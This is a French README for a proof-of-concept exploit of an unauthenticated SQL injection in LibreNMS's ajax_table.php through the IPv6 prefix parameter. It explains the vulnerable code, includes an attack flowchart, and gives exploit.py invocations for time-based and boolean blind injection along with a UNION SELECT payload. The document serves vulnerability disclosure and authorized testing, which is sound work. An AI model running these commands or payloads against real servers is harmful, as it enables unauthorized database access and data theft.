
Preuve de concept d'exploitation pour une injection SQL non authentifiée dans LibreNMS ajax_table.php, démontrant des techniques d'injection aveugle basées sur le temps et sur les booléens pour des tests de sécurité autorisés.
Injection SQL non authentifiée dans ajax_table.php de LibreNMS via le paramètre de recherche d'adresse IPv6.
15429580baba03ed1dd377bada1bde4b7a1175a1)CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:NLe paramètre address lorsque search_type=ipv6 est divisé sur / en adresse et préfixe.
Le préfixe est directement concaténé dans une requête SQL sans échappement :
$sql .= " AND ipv6_prefixlen = '$prefix'";
Un guillemet simple (') dans la partie préfixe permet de sortir du littéral de chaîne → injection SQL arbitraire.
flowchart TD
A[Attaquant] -->|1. POST HTTP vers /ajax_table.php| B[Serveur web LibreNMS]
B -->|2. id=address-search & search_type=ipv6| C[Analyse du paramètre address]
C -->|3. Division sur '/' → $address / $prefix| D[Construction de la requête SQL vulnérable]
D -->|4. Concaténation : ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
E -->|5. Exécution de la requête injectée| F[Retour des résultats / erreur / délai]
F -->|6. L'attaquant observe la réponse / le timing| A
subgraph "Point d'injection"
D
end
style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
requests (pip install requests)python3 exploit.py http://cible/librenms --test
python3 exploit.py http://192.168.1.50/librenms --time
→ Si la réponse prend >5–6 secondes → vulnérable
python3 exploit.py http://cible/librenms --boolean
python3 exploit.py http://cible/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
exploit.py .............. Script principal de la preuve de concept (renommer depuis cve-2026-26988-poc.py si nécessaire)README.md ............... Ce fichier15429580baba... → PR #18777Cette preuve de concept est fournie à des fins éducatives et de tests de sécurité autorisés uniquement.
N'utilisez PAS ce code contre un système ou un réseau sans autorisation écrite explicite du propriétaire.
Toute utilisation non autorisée peut violer des lois, y compris (sans s'y limiter) le Computer Fraud and Abuse Act (CFAA) aux États-Unis, ou une législation équivalente dans votre pays.
Utilisation à vos propres risques.
Auteur : Mohammed Idrees Banyamer
Instagram : @banyamer_security
Date : 20 février 2026